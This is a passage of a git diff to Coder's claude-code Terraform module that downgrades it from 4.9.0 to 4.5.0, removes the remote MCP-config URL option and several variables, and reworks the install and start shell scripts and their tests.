+  version         = "4.5.0"
  agent_id        = coder_agent.main.id
  workdir         = "/home/coder/project"
  enable_aibridge = true
@@ -109,11 +92,12 @@ resource "coder_ai_task" "task" {
 data "coder_task" "me" {}

 module "claude-code" {
-  source    = "registry.coder.com/coder/claude-code/coder"
-  version   = "4.9.0"
-  agent_id  = coder_agent.main.id
-  workdir   = "/home/coder/project"
-  ai_prompt = data.coder_task.me.prompt
+  source         = "registry.coder.com/coder/claude-code/coder"
+  version        = "4.5.0"
+  agent_id       = coder_agent.main.id
+  workdir        = "/home/coder/project"
+  claude_api_key = "xxxx-xxxxx-xxxx"
+  ai_prompt      = data.coder_task.me.prompt

  # Optional: route through AI Bridge (Premium feature)
  # enable_aibridge = true
@@ -125,15 +109,12 @@ module "claude-code" {
 This example shows additional configuration options for version pinning, custom models, and MCP servers.

 > [!NOTE]
-> The `claude_binary_path` variable can be used to specify where a pre-installed Claude binary is located.
-
-> [!WARNING]
-> **Deprecation Notice**: The npm installation method (`install_via_npm = true`) will be deprecated and removed in the next major release. Please use the default binary installation method instead.
+> When a specific `claude_code_version` (other than "latest") is provided, the module will install Claude Code via npm instead of the official installer. This allows for version pinning. The `claude_binary_path` variable can be used to specify where a pre-installed Claude binary is located.

 ```tf
 module "claude-code" {
  source   = "registry.coder.com/coder/claude-code/coder"
-  version  = "4.9.0"
+  version  = "4.5.0"
  agent_id = coder_agent.main.id
  workdir  = "/home/coder/project"

@@ -141,7 +122,7 @@ module "claude-code" {
  # OR
  claude_code_oauth_token = "xxxxx-xxxx-xxxx"

-  claude_code_version = "2.0.62"          # Pin to a specific version
+  claude_code_version = "2.0.62"          # Pin to a specific version (uses npm)
  claude_binary_path  = "/opt/claude/bin" # Path to pre-installed Claude binary
  agentapi_version    = "0.11.4"

@@ -158,30 +139,9 @@ module "claude-code" {
    }
  }
  EOF
-
-  mcp_config_remote_path = [
-    "https://gist.githubusercontent.com/35C4n0r/cd8dce70360e5d22a070ae21893caed4/raw/",
-    "https://raw.githubusercontent.com/coder/coder/main/.mcp.json"
-  ]
 }
 ```

-> [!NOTE]
-> Remote URLs should return a JSON body in the following format:
->
-> ```json
-> {
->   "mcpServers": {
->     "server-name": {
->       "command": "some-command",
->       "args": ["arg1", "arg2"]
->     }
->   }
-> }
-> ```
->
-> The `Content-Type` header doesn't matter—both `text/plain` and `application/json` work fine.
-
 ### Standalone Mode

 Run and configure Claude Code as a standalone CLI in your workspace.
@@ -189,7 +149,7 @@ Run and configure Claude Code as a standalone CLI in your workspace.
 ```tf
 module "claude-code" {
  source              = "registry.coder.com/coder/claude-code/coder"
-  version             = "4.9.0"
+  version             = "4.5.0"
  agent_id            = coder_agent.main.id
  workdir             = "/home/coder/project"
  install_claude_code = true
@@ -211,7 +171,7 @@ variable "claude_code_oauth_token" {

 module "claude-code" {
  source                  = "registry.coder.com/coder/claude-code/coder"
-  version                 = "4.9.0"
+  version                 = "4.5.0"
  agent_id                = coder_agent.main.id
  workdir                 = "/home/coder/project"
  claude_code_oauth_token = var.claude_code_oauth_token
@@ -222,7 +182,7 @@ module "claude-code" {

 #### Prerequisites

-AWS account with Bedrock access, Claude models enabled in Bedrock console, and appropriate IAM permissions.
+AWS account with Bedrock access, Claude models enabled in Bedrock console, appropriate IAM permissions.

 Configure Claude Code to use AWS Bedrock for accessing Claude models through your AWS infrastructure.

@@ -284,7 +244,7 @@ resource "coder_env" "bedrock_api_key" {

 module "claude-code" {
  source   = "registry.coder.com/coder/claude-code/coder"
-  version  = "4.9.0"
+  version  = "4.5.0"
  agent_id = coder_agent.main.id
  workdir  = "/home/coder/project"
  model    = "global.anthropic.claude-sonnet-4-5-20250929-v1:0"
@@ -298,7 +258,7 @@ module "claude-code" {

 #### Prerequisites

-GCP project with Vertex AI API enabled, Claude models enabled through Model Garden, service account with Vertex AI permissions, and appropriate IAM permissions (Vertex AI User role).
+GCP project with Vertex AI API enabled, Claude models enabled through Model Garden, service account with Vertex AI permissions, appropriate IAM permissions (Vertex AI User role).

 Configure Claude Code to use Google Vertex AI for accessing Claude models through Google Cloud Platform.

@@ -341,7 +301,7 @@ resource "coder_env" "google_application_credentials" {

 module "claude-code" {
  source   = "registry.coder.com/coder/claude-code/coder"
-  version  = "4.9.0"
+  version  = "4.5.0"
  agent_id = coder_agent.main.id
  workdir  = "/home/coder/project"
  model    = "claude-sonnet-4@20250514"
@@ -461,54 +461,4 @@ EOF`,
    expect(startLog.stdout).toContain(taskSessionId);
    expect(startLog.stdout).not.toContain("manual-456");
  });
-
-  test("mcp-config-remote-path", async () => {
-    const failingUrl = "http://localhost:19999/mcp.json";
-    const successUrl =
-      "https://raw.githubusercontent.com/coder/coder/main/.mcp.json";
-
-    const { id, coderEnvVars } = await setup({
-      skipClaudeMock: true,
-      moduleVariables: {
-        mcp_config_remote_path: JSON.stringify([failingUrl, successUrl]),
-      },
-    });
-    await execModuleScript(id, coderEnvVars);
-
-    const installLog = await readFileContainer(
-      id,
-      "/home/coder/.claude-module/install.log",
-    );
-
-    // Verify both URLs are attempted
-    expect(installLog).toContain(failingUrl);
-    expect(installLog).toContain(successUrl);
-
-    // First URL should fail gracefully
-    expect(installLog).toContain(
-      `Warning: Failed to fetch MCP configuration from '${failingUrl}'`,
-    );
-
-    // Second URL should succeed - no failure warning for it
-    expect(installLog).not.toContain(
-      `Warning: Failed to fetch MCP configuration from '${successUrl}'`,
-    );
-
-    // Should contain the MCP server add command from successful fetch
-    expect(installLog).toContain(
-      "Added stdio MCP server go-language-server to local config",
-    );
-
-    expect(installLog).toContain(
-      "Added stdio MCP server typescript-language-server to local config",
-    );
-
-    // Verify the MCP config was added to claude.json
-    const claudeConfig = await readFileContainer(
-      id,
-      "/home/coder/.claude.json",
-    );
-    expect(claudeConfig).toContain("typescript-language-server");
-    expect(claudeConfig).toContain("go-language-server");
-  });
 });
@@ -1,5 +1,5 @@
 terraform {
-  required_version = ">= 1.9"
+  required_version = ">= 1.0"

  required_providers {
    coder = {
@@ -47,12 +47,6 @@ variable "report_tasks" {
  default     = true
 }

-variable "web_app" {
-  type        = bool
-  description = "Whether to create the web app for Claude Code. When false, AgentAPI still runs but no web UI app icon is shown in the Coder dashboard. This is automatically enabled when using Coder Tasks, regardless of this setting."
-  default     = true
-}
-
 variable "cli_app" {
  type        = bool
  description = "Whether to create a CLI app for Claude Code"
@@ -73,7 +67,7 @@ variable "cli_app_display_name" {

 variable "pre_install_script" {
  type        = string
-  description = "Custom script to run before installing Claude Code. Can be used for dependency ordering between modules (e.g., waiting for git-clone to complete before Claude Code initialization)."
+  description = "Custom script to run before installing Claude Code."
  default     = null
 }

@@ -172,12 +166,6 @@ variable "mcp" {
  default     = ""
 }

-variable "mcp_config_remote_path" {
-  type        = list(string)
-  description = "List of URLs that return JSON MCP server configurations (text/plain with valid JSON)"
-  default     = []
-}
-
 variable "allowed_tools" {
  type        = string
  description = "A list of tools that should be allowed without prompting the user for permission, in addition to settings.json files."
@@ -214,11 +202,6 @@ variable "claude_binary_path" {
  type        = string
  description = "Directory where the Claude Code binary is located. Use this if Claude is pre-installed or installed outside the module to a non-default location."
  default     = "$HOME/.local/bin"
-
-  validation {
-    condition     = var.claude_binary_path == "$HOME/.local/bin" || !var.install_claude_code
-    error_message = "Custom claude_binary_path can only be used when install_claude_code is false. The official installer always installs to $HOME/.local/bin and does not support custom paths."
-  }
 }

 variable "install_via_npm" {
@@ -235,8 +218,8 @@ variable "enable_boundary" {

 variable "boundary_version" {
  type        = string
-  description = "Boundary version. When use_boundary_directly is true, a release version should be provided or 'latest' for the latest release. When compile_boundary_from_source is true, a valid git reference should be provided (tag, commit, branch)."
-  default     = "latest"
+  description = "Boundary version, valid git reference should be provided (tag, commit, branch)"
+  default     = "main"
 }

 variable "compile_boundary_from_source" {
@@ -245,12 +228,6 @@ variable "compile_boundary_from_source" {
  default     = false
 }

-variable "use_boundary_directly" {
-  type        = bool
-  description = "Whether to use boundary binary directly instead of coder boundary subcommand. When false (default), uses coder boundary subcommand. When true, installs and uses boundary binary from release."
-  default     = false
-}
-
 variable "enable_aibridge" {
  type        = bool
  description = "Use AI Bridge for Claude Code. https://coder.com/docs/ai-coder/ai-bridge"
@@ -267,10 +244,10 @@ variable "enable_aibridge" {
  }
 }

-variable "enable_state_persistence" {
-  type        = bool
-  description = "Enable AgentAPI conversation state persistence across restarts."
-  default     = true
+variable "cli_command" {
+  type        = string
+  description = "The command to run for the Claude Code CLI app when tasks are disabled."
+  default     = ""
 }

 resource "coder_env" "claude_code_md_path" {
@@ -293,11 +270,9 @@ resource "coder_env" "claude_code_oauth_token" {
 }

 resource "coder_env" "claude_api_key" {
-  count = (var.enable_aibridge || (var.claude_api_key != "")) ? 1 : 0
-
  agent_id = var.agent_id
  name     = "CLAUDE_API_KEY"
-  value    = local.claude_api_key
+  value    = var.enable_aibridge ? data.coder_workspace_owner.me.session_token : var.claude_api_key
 }

 resource "coder_env" "disable_autoupdater" {
@@ -307,6 +282,18 @@ resource "coder_env" "disable_autoupdater" {
  value    = "1"
 }

+resource "coder_env" "claude_binary_path" {
+  agent_id = var.agent_id
+  name     = "PATH"
+  value    = "${var.claude_binary_path}:$PATH"
+
+  lifecycle {
+    precondition {
+      condition     = var.claude_binary_path == "$HOME/.local/bin" || !var.install_claude_code
+      error_message = "Custom claude_binary_path can only be used when install_claude_code is false. The official installer and npm both install to fixed locations."
+    }
+  }
+}

 resource "coder_env" "anthropic_model" {
  count    = var.model != "" ? 1 : 0
@@ -331,8 +318,7 @@ locals {
  start_script    = file("${path.module}/scripts/start.sh")
  module_dir_name = ".claude-module"
  # Extract hostname from access_url for boundary --allow flag
-  coder_host     = replace(replace(data.coder_workspace.me.access_url, "https://", ""), "http://", "")
-  claude_api_key = var.enable_aibridge ? data.coder_workspace_owner.me.session_token : var.claude_api_key
+  coder_host = replace(replace(data.coder_workspace.me.access_url, "https://", ""), "http://", "")

  # Required prompts for the module to properly report task status to Coder
  report_tasks_system_prompt = <<-EOT
@@ -364,76 +350,109 @@ locals {
    var.report_tasks ? format("\n%s\n", local.report_tasks_system_prompt) : "",
    local.custom_system_prompt != "" ? format("\n%s\n", local.custom_system_prompt) : ""
  )
-}

-module "agentapi" {
-  source  = "registry.coder.com/coder/agentapi/coder"
-  version = "2.3.0"
+  # Common environment variables for install script
+  install_env_vars = <<-EOT
+    export ARG_CLAUDE_CODE_VERSION='${var.claude_code_version}'
+    export ARG_MCP_APP_STATUS_SLUG='${local.app_slug}'
+    export ARG_INSTALL_CLAUDE_CODE='${var.install_claude_code}'
+    export ARG_CLAUDE_BINARY_PATH='${var.claude_binary_path}'
+    export ARG_INSTALL_VIA_NPM='${var.install_via_npm}'
+    export ARG_REPORT_TASKS='${var.report_tasks}'
+    export ARG_WORKDIR='${local.workdir}'
+    export ARG_ALLOWED_TOOLS='${var.allowed_tools}'
+    export ARG_DISALLOWED_TOOLS='${var.disallowed_tools}'
+    export ARG_MCP='${var.mcp != null ? base64encode(replace(var.mcp, "'", "'\\''")) : ""}'
+    export ARG_ENABLE_AIBRIDGE='${var.enable_aibridge}'
+  EOT

-  agent_id = var.agent_id
-  # TODO: pass web_app = var.web_app once agentapi module is published with web_app support
-  web_app_slug             = local.app_slug
-  web_app_order            = var.order
-  web_app_group            = var.group
-  web_app_icon             = var.icon
-  web_app_display_name     = var.web_app_display_name
-  folder                   = local.workdir
-  cli_app                  = var.cli_app
-  cli_app_slug             = var.cli_app ? "${local.app_slug}-cli" : null
-  cli_app_display_name     = var.cli_app ? var.cli_app_display_name : null
-  agentapi_subdomain       = var.subdomain
-  module_dir_name          = local.module_dir_name
-  install_agentapi         = var.install_agentapi
-  agentapi_version         = var.agentapi_version
-  enable_state_persistence = var.enable_state_persistence
-  pre_install_script       = var.pre_install_script
-  post_install_script      = var.post_install_script
-  start_script             = <<-EOT
+  # Common environment variables for start script
+  start_env_vars = <<-EOT
+    export ARG_RESUME_SESSION_ID='${var.resume_session_id}'
+    export ARG_CONTINUE='${var.continue}'
+    export ARG_DANGEROUSLY_SKIP_PERMISSIONS='${var.dangerously_skip_permissions}'
+    export ARG_PERMISSION_MODE='${var.permission_mode}'
+    export ARG_WORKDIR='${local.workdir}'
+    export ARG_AI_PROMPT='${base64encode(var.ai_prompt)}'
+    export ARG_REPORT_TASKS='${var.report_tasks}'
+    export ARG_ENABLE_BOUNDARY='${var.enable_boundary}'
+    export ARG_BOUNDARY_VERSION='${var.boundary_version}'
+    export ARG_COMPILE_FROM_SOURCE='${var.compile_boundary_from_source}'
+    export ARG_CODER_HOST='${local.coder_host}'
+    export ARG_NON_AGENTAPI_CLI='${!var.report_tasks && var.cli_app ? true : false}'
+  EOT
+
+  # Reusable install script command
+  install_command = <<-EOT
+    #!/bin/bash
+    set -o pipefail
+
+    echo -n '${base64encode(local.install_script)}' | base64 -d > /tmp/install.sh
+
+    chmod +x /tmp/install.sh
+    ${local.install_env_vars}
+    /tmp/install.sh
+  EOT
+
+  # Reusable start script command for agentapi module
+  agentapi_start_command = <<-EOT
    #!/bin/bash
    set -o errexit
    set -o pipefail
    echo -n '${base64encode(local.start_script)}' | base64 -d > /tmp/start.sh
    chmod +x /tmp/start.sh

-    ARG_RESUME_SESSION_ID='${var.resume_session_id}' \
-    ARG_CONTINUE='${var.continue}' \
-    ARG_DANGEROUSLY_SKIP_PERMISSIONS='${var.dangerously_skip_permissions}' \
-    ARG_PERMISSION_MODE='${var.permission_mode}' \
-    ARG_WORKDIR='${local.workdir}' \
-    ARG_AI_PROMPT='${base64encode(var.ai_prompt)}' \
-    ARG_REPORT_TASKS='${var.report_tasks}' \
-    ARG_ENABLE_BOUNDARY='${var.enable_boundary}' \
-    ARG_BOUNDARY_VERSION='${var.boundary_version}' \
-    ARG_COMPILE_FROM_SOURCE='${var.compile_boundary_from_source}' \
-    ARG_USE_BOUNDARY_DIRECTLY='${var.use_boundary_directly}' \
-    ARG_CODER_HOST='${local.coder_host}' \
-    ARG_CLAUDE_BINARY_PATH='${var.claude_binary_path}' \
+    ${local.start_env_vars}
    /tmp/start.sh
  EOT
+}

-  install_script = <<-EOT
-    #!/bin/bash
-    set -o errexit
-    set -o pipefail
+resource "coder_script" "install_agent" {
+  count = !var.report_tasks ? 1 : 0

-    echo -n '${base64encode(local.install_script)}' | base64 -d > /tmp/install.sh
-    chmod +x /tmp/install.sh
-    ARG_CLAUDE_CODE_VERSION='${var.claude_code_version}' \
-    ARG_MCP_APP_STATUS_SLUG='${local.app_slug}' \
-    ARG_INSTALL_CLAUDE_CODE='${var.install_claude_code}' \
-    ARG_CLAUDE_BINARY_PATH='${var.claude_binary_path}' \
-    ARG_INSTALL_VIA_NPM='${var.install_via_npm}' \
-    ARG_REPORT_TASKS='${var.report_tasks}' \
-    ARG_WORKDIR='${local.workdir}' \
-    ARG_ALLOWED_TOOLS='${var.allowed_tools}' \
-    ARG_DISALLOWED_TOOLS='${var.disallowed_tools}' \
-    ARG_MCP='${var.mcp != null ? base64encode(replace(var.mcp, "'", "'\\''")) : ""}' \
-    ARG_MCP_CONFIG_REMOTE_PATH='${base64encode(jsonencode(var.mcp_config_remote_path))}' \
-    ARG_ENABLE_AIBRIDGE='${var.enable_aibridge}' \
-    /tmp/install.sh
-  EOT
+  agent_id     = var.agent_id
+  display_name = "Install agent"
+  run_on_start = true
+  log_path     = "/home/coder/install.log"
+  script       = local.install_command
+}
+
+resource "coder_app" "agent_cli" {
+  count = (!var.report_tasks && var.cli_app) ? 1 : 0
+
+  agent_id     = var.agent_id
+  slug         = local.app_slug
+  display_name = var.cli_app_display_name
+
+  command = length(trimprefix(var.cli_command, " ")) > 0 ? var.cli_command : local.agentapi_start_command
+}
+
+
+module "agentapi" {
+  source  = "registry.coder.com/coder/agentapi/coder"
+  version = "2.0.0"
+
+  count                = var.report_tasks ? 1 : 0
+  agent_id             = var.agent_id
+  web_app_slug         = local.app_slug
+  web_app_order        = var.order
+  web_app_group        = var.group
+  web_app_icon         = var.icon
+  web_app_display_name = var.web_app_display_name
+  folder               = local.workdir
+  cli_app              = var.cli_app
+  cli_app_slug         = var.cli_app ? "${local.app_slug}-cli" : null
+  cli_app_display_name = var.cli_app ? var.cli_app_display_name : null
+  agentapi_subdomain   = var.subdomain
+  module_dir_name      = local.module_dir_name
+  install_agentapi     = var.install_agentapi
+  agentapi_version     = var.agentapi_version
+  pre_install_script   = var.pre_install_script
+  post_install_script  = var.post_install_script
+  start_script         = local.agentapi_start_command
+  install_script       = local.install_command
 }

 output "task_app_id" {
-  value = module.agentapi.task_app_id
+  value = try(module.agentapi[0].task_app_id, null)
 }
@@ -42,7 +42,7 @@ run "test_claude_code_with_api_key" {
  }

  assert {
-    condition     = coder_env.claude_api_key[0].value == "test-api-key-123"
+    condition     = coder_env.claude_api_key.value == "test-api-key-123"
    error_message = "Claude API key value should match the input"
  }
 }
@@ -298,13 +298,6 @@ run "test_aibridge_enabled" {
    enable_aibridge = true
  }

-  override_data {
-    target = data.coder_workspace_owner.me
-    values = {
-      session_token = "mock-session-token"
-    }
-  }
-
  assert {
    condition     = var.enable_aibridge == true
    error_message = "AI Bridge should be enabled"
@@ -321,12 +314,12 @@ run "test_aibridge_enabled" {
  }

  assert {
-    condition     = coder_env.claude_api_key[0].name == "CLAUDE_API_KEY"
+    condition     = coder_env.claude_api_key.name == "CLAUDE_API_KEY"
    error_message = "CLAUDE_API_KEY environment variable should be set"
  }

  assert {
-    condition     = coder_env.claude_api_key[0].value == data.coder_workspace_owner.me.session_token
+    condition     = coder_env.claude_api_key.value == data.coder_workspace_owner.me.session_token
    error_message = "CLAUDE_API_KEY should use workspace owner's session token when aibridge is enabled"
  }
 }
@@ -377,7 +370,7 @@ run "test_aibridge_disabled_with_api_key" {
  }

  assert {
-    condition     = coder_env.claude_api_key[0].value == "test-api-key-xyz"
+    condition     = coder_env.claude_api_key.value == "test-api-key-xyz"
    error_message = "CLAUDE_API_KEY should use the provided API key when aibridge is disabled"
  }

@@ -386,62 +379,3 @@ run "test_aibridge_disabled_with_api_key" {
    error_message = "ANTHROPIC_BASE_URL should not be set when aibridge is disabled"
  }
 }
-
-run "test_enable_state_persistence_default" {
-  command = plan
-
-  variables {
-    agent_id = "test-agent"
-    workdir  = "/home/coder"
-  }
-
-  assert {
-    condition     = var.enable_state_persistence == true
-    error_message = "enable_state_persistence should default to true"
-  }
-}
-
-run "test_disable_state_persistence" {
-  command = plan
-
-  variables {
-    agent_id                 = "test-agent"
-    workdir                  = "/home/coder"
-    enable_state_persistence = false
-  }
-
-  assert {
-    condition     = var.enable_state_persistence == false
-    error_message = "enable_state_persistence should be false when explicitly disabled"
-  }
-}
-
-run "test_no_api_key_no_env" {
-  command = plan
-
-  variables {
-    agent_id        = "test-agent-no-key"
-    workdir         = "/home/coder/test"
-    enable_aibridge = false
-  }
-
-  assert {
-    condition     = length(coder_env.claude_api_key) == 0
-    error_message = "CLAUDE_API_KEY should not be created when no API key is provided and aibridge is disabled"
-  }
-}
-
-run "test_api_key_count_with_aibridge_no_override" {
-  command = plan
-
-  variables {
-    agent_id        = "test-agent-count"
-    workdir         = "/home/coder/test"
-    enable_aibridge = true
-  }
-
-  assert {
-    condition     = length(coder_env.claude_api_key) == 1
-    error_message = "CLAUDE_API_KEY env should be created when aibridge is enabled, regardless of session_token value"
-  }
-}
@@ -12,19 +12,14 @@ ARG_CLAUDE_CODE_VERSION=${ARG_CLAUDE_CODE_VERSION:-}
 ARG_WORKDIR=${ARG_WORKDIR:-"$HOME"}
 ARG_INSTALL_CLAUDE_CODE=${ARG_INSTALL_CLAUDE_CODE:-}
 ARG_CLAUDE_BINARY_PATH=${ARG_CLAUDE_BINARY_PATH:-"$HOME/.local/bin"}
-ARG_CLAUDE_BINARY_PATH="${ARG_CLAUDE_BINARY_PATH/#\~/$HOME}"
-ARG_CLAUDE_BINARY_PATH="${ARG_CLAUDE_BINARY_PATH//\$HOME/$HOME}"
 ARG_INSTALL_VIA_NPM=${ARG_INSTALL_VIA_NPM:-false}
 ARG_REPORT_TASKS=${ARG_REPORT_TASKS:-true}
 ARG_MCP_APP_STATUS_SLUG=${ARG_MCP_APP_STATUS_SLUG:-}
 ARG_MCP=$(echo -n "${ARG_MCP:-}" | base64 -d)
-ARG_MCP_CONFIG_REMOTE_PATH=$(echo -n "${ARG_MCP_CONFIG_REMOTE_PATH:-}" | base64 -d)
 ARG_ALLOWED_TOOLS=${ARG_ALLOWED_TOOLS:-}
 ARG_DISALLOWED_TOOLS=${ARG_DISALLOWED_TOOLS:-}
 ARG_ENABLE_AIBRIDGE=${ARG_ENABLE_AIBRIDGE:-false}

-export PATH="$ARG_CLAUDE_BINARY_PATH:$PATH"
-
 echo "--------------------------------"

 printf "ARG_CLAUDE_CODE_VERSION: %s\n" "$ARG_CLAUDE_CODE_VERSION"
@@ -35,71 +30,45 @@ printf "ARG_INSTALL_VIA_NPM: %s\n" "$ARG_INSTALL_VIA_NPM"
 printf "ARG_REPORT_TASKS: %s\n" "$ARG_REPORT_TASKS"
 printf "ARG_MCP_APP_STATUS_SLUG: %s\n" "$ARG_MCP_APP_STATUS_SLUG"
 printf "ARG_MCP: %s\n" "$ARG_MCP"
-printf "ARG_MCP_CONFIG_REMOTE_PATH: %s\n" "$ARG_MCP_CONFIG_REMOTE_PATH"
 printf "ARG_ALLOWED_TOOLS: %s\n" "$ARG_ALLOWED_TOOLS"
 printf "ARG_DISALLOWED_TOOLS: %s\n" "$ARG_DISALLOWED_TOOLS"
 printf "ARG_ENABLE_AIBRIDGE: %s\n" "$ARG_ENABLE_AIBRIDGE"

 echo "--------------------------------"

-function add_mcp_servers() {
-  local mcp_json="$1"
-  local source_desc="$2"
-
-  while IFS= read -r server_name && IFS= read -r server_json; do
-    echo "------------------------"
-    echo "Executing: claude mcp add-json \"$server_name\" '$server_json' ($source_desc)"
-    claude mcp add-json "$server_name" "$server_json" || echo "Warning: Failed to add MCP server '$server_name', continuing..."
-    echo "------------------------"
-    echo ""
-  done < <(echo "$mcp_json" | jq -r '.mcpServers | to_entries[] | .key, (.value | @json)')
-}
-
-function add_path_to_shell_profiles() {
-  local path_dir="$1"
-
-  for profile in "$HOME/.profile" "$HOME/.bash_profile" "$HOME/.bashrc" "$HOME/.zprofile" "$HOME/.zshrc"; do
-    if [ -f "$profile" ]; then
-      if ! grep -q "$path_dir" "$profile" 2> /dev/null; then
-        echo "export PATH=\"\$PATH:$path_dir\"" >> "$profile"
-        echo "Added $path_dir to $profile"
-      fi
-    fi
-  done
-
-  local fish_config="$HOME/.config/fish/config.fish"
-  if [ -f "$fish_config" ]; then
-    if ! grep -q "$path_dir" "$fish_config" 2> /dev/null; then
-      echo "fish_add_path $path_dir" >> "$fish_config"
-      echo "Added $path_dir to $fish_config"
-    fi
-  fi
-}
-
 function ensure_claude_in_path() {
-  local CLAUDE_BIN=""
-  if command -v claude > /dev/null 2>&1; then
-    CLAUDE_BIN=$(command -v claude)
-  elif [ -x "$ARG_CLAUDE_BINARY_PATH/claude" ]; then
-    CLAUDE_BIN="$ARG_CLAUDE_BINARY_PATH/claude"
-  elif [ -x "$HOME/.local/bin/claude" ]; then
-    CLAUDE_BIN="$HOME/.local/bin/claude"
-  fi
-
-  if [ -z "$CLAUDE_BIN" ] || [ ! -x "$CLAUDE_BIN" ]; then
-    echo "Warning: Could not find claude binary"
+  if [ -z "${CODER_SCRIPT_BIN_DIR:-}" ]; then
+    echo "CODER_SCRIPT_BIN_DIR not set, skipping PATH setup"
    return
  fi

-  local CLAUDE_DIR
-  CLAUDE_DIR=$(dirname "$CLAUDE_BIN")
+  if [ ! -e "$CODER_SCRIPT_BIN_DIR/claude" ]; then
+    local CLAUDE_BIN=""
+    if command -v claude > /dev/null 2>&1; then
+      CLAUDE_BIN=$(command -v claude)
+    elif [ -x "$ARG_CLAUDE_BINARY_PATH/claude" ]; then
+      CLAUDE_BIN="$ARG_CLAUDE_BINARY_PATH/claude"
+    elif [ -x "$HOME/.local/bin/claude" ]; then
+      CLAUDE_BIN="$HOME/.local/bin/claude"
+    fi

-  if [ -n "${CODER_SCRIPT_BIN_DIR:-}" ] && [ ! -e "$CODER_SCRIPT_BIN_DIR/claude" ]; then
-    ln -s "$CLAUDE_BIN" "$CODER_SCRIPT_BIN_DIR/claude"
-    echo "Created symlink: $CODER_SCRIPT_BIN_DIR/claude -> $CLAUDE_BIN"
+    if [ -n "$CLAUDE_BIN" ] && [ -x "$CLAUDE_BIN" ]; then
+      ln -s "$CLAUDE_BIN" "$CODER_SCRIPT_BIN_DIR/claude"
+      echo "Created symlink: $CODER_SCRIPT_BIN_DIR/claude -> $CLAUDE_BIN"
+    else
+      echo "Warning: Could not find claude binary to symlink"
+    fi
+  else
+    echo "Claude already available in CODER_SCRIPT_BIN_DIR"
  fi

-  add_path_to_shell_profiles "$CLAUDE_DIR"
+  local marker="# Added by claude-code module"
+  for profile in "$HOME/.bashrc" "$HOME/.zshrc" "$HOME/.profile"; do
+    if [ -f "$profile" ] && ! grep -q "$marker" "$profile" 2> /dev/null; then
+      printf "\n%s\nexport PATH=\"%s:\$PATH\"\n" "$marker" "$CODER_SCRIPT_BIN_DIR" >> "$profile"
+      echo "Added $CODER_SCRIPT_BIN_DIR to PATH in $profile"
+    fi
+  done
 }

 function install_claude_code_cli() {
@@ -109,9 +78,8 @@ function install_claude_code_cli() {
    return
  fi

-  # Use npm when install_via_npm is true
-  if [ "$ARG_INSTALL_VIA_NPM" = "true" ]; then
-    echo "WARNING: npm installation method will be deprecated and removed in the next major release."
+  # Use npm when install_via_npm is true or for specific version pinning
+  if [ "$ARG_INSTALL_VIA_NPM" = "true" ] || { [ -n "$ARG_CLAUDE_CODE_VERSION" ] && [ "$ARG_CLAUDE_CODE_VERSION" != "latest" ]; }; then
    echo "Installing Claude Code via npm (version: $ARG_CLAUDE_CODE_VERSION)"
    npm install -g "@anthropic-ai/claude-code@$ARG_CLAUDE_CODE_VERSION"
    echo "Installed Claude Code via npm. Version: $(claude --version || echo 'unknown')"
@@ -144,25 +112,13 @@ function setup_claude_configurations() {
  if [ "$ARG_MCP" != "" ]; then
    (
      cd "$ARG_WORKDIR"
-      add_mcp_servers "$ARG_MCP" "in $ARG_WORKDIR"
-    )
-  fi
-
-  if [ -n "$ARG_MCP_CONFIG_REMOTE_PATH" ] && [ "$ARG_MCP_CONFIG_REMOTE_PATH" != "[]" ]; then
-    (
-      cd "$ARG_WORKDIR"
-      for url in $(echo "$ARG_MCP_CONFIG_REMOTE_PATH" | jq -r '.[]'); do
-        echo "Fetching MCP configuration from: $url"
-        mcp_json=$(curl -fsSL "$url") || {
-          echo "Warning: Failed to fetch MCP configuration from '$url', continuing..."
-          continue
-        }
-        if ! echo "$mcp_json" | jq -e '.mcpServers' > /dev/null 2>&1; then
-          echo "Warning: Invalid MCP configuration from '$url' (missing mcpServers), continuing..."
-          continue
-        fi
-        add_mcp_servers "$mcp_json" "from $url"
-      done
+      while IFS= read -r server_name && IFS= read -r server_json; do
+        echo "------------------------"
+        echo "Executing: claude mcp add-json \"$server_name\" '$server_json' (in $ARG_WORKDIR)"
+        claude mcp add-json "$server_name" "$server_json" || echo "Warning: Failed to add MCP server '$server_name', continuing..."
+        echo "------------------------"
+        echo ""
+      done < <(echo "$ARG_MCP" | jq -r '.mcpServers | to_entries[] | .key, (.value | @json)')
    )
  fi

@@ -2,11 +2,7 @@

 set -euo pipefail

-ARG_CLAUDE_BINARY_PATH=${ARG_CLAUDE_BINARY_PATH:-"$HOME/.local/bin"}
-ARG_CLAUDE_BINARY_PATH="${ARG_CLAUDE_BINARY_PATH/#\~/$HOME}"
-ARG_CLAUDE_BINARY_PATH="${ARG_CLAUDE_BINARY_PATH//\$HOME/$HOME}"
-
-export PATH="$ARG_CLAUDE_BINARY_PATH:$PATH"
+true > "$HOME/start.log"

 command_exists() {
  command -v "$1" > /dev/null 2>&1
@@ -20,39 +16,44 @@ ARG_WORKDIR=${ARG_WORKDIR:-"$HOME"}
 ARG_AI_PROMPT=$(echo -n "${ARG_AI_PROMPT:-}" | base64 -d)
 ARG_REPORT_TASKS=${ARG_REPORT_TASKS:-true}
 ARG_ENABLE_BOUNDARY=${ARG_ENABLE_BOUNDARY:-false}
-ARG_BOUNDARY_VERSION=${ARG_BOUNDARY_VERSION:-"latest"}
+ARG_BOUNDARY_VERSION=${ARG_BOUNDARY_VERSION:-"main"}
 ARG_COMPILE_FROM_SOURCE=${ARG_COMPILE_FROM_SOURCE:-false}
-ARG_USE_BOUNDARY_DIRECTLY=${ARG_USE_BOUNDARY_DIRECTLY:-false}
 ARG_CODER_HOST=${ARG_CODER_HOST:-}
+ARG_NON_AGENTAPI_CLI=${ARG_NON_AGENTAPI_CLI:-false}

-echo "--------------------------------"
+log() {
+  if [[ "${ARG_NON_AGENTAPI_CLI}" = "true" ]]; then
+    printf -- "$@" >> "$HOME/start.log"
+  else
+    printf -- "$@"
+  fi
+}

-printf "ARG_RESUME: %s\n" "$ARG_RESUME_SESSION_ID"
-printf "ARG_CONTINUE: %s\n" "$ARG_CONTINUE"
-printf "ARG_DANGEROUSLY_SKIP_PERMISSIONS: %s\n" "$ARG_DANGEROUSLY_SKIP_PERMISSIONS"
-printf "ARG_PERMISSION_MODE: %s\n" "$ARG_PERMISSION_MODE"
-printf "ARG_AI_PROMPT: %s\n" "$ARG_AI_PROMPT"
-printf "ARG_WORKDIR: %s\n" "$ARG_WORKDIR"
-printf "ARG_REPORT_TASKS: %s\n" "$ARG_REPORT_TASKS"
-printf "ARG_ENABLE_BOUNDARY: %s\n" "$ARG_ENABLE_BOUNDARY"
-printf "ARG_BOUNDARY_VERSION: %s\n" "$ARG_BOUNDARY_VERSION"
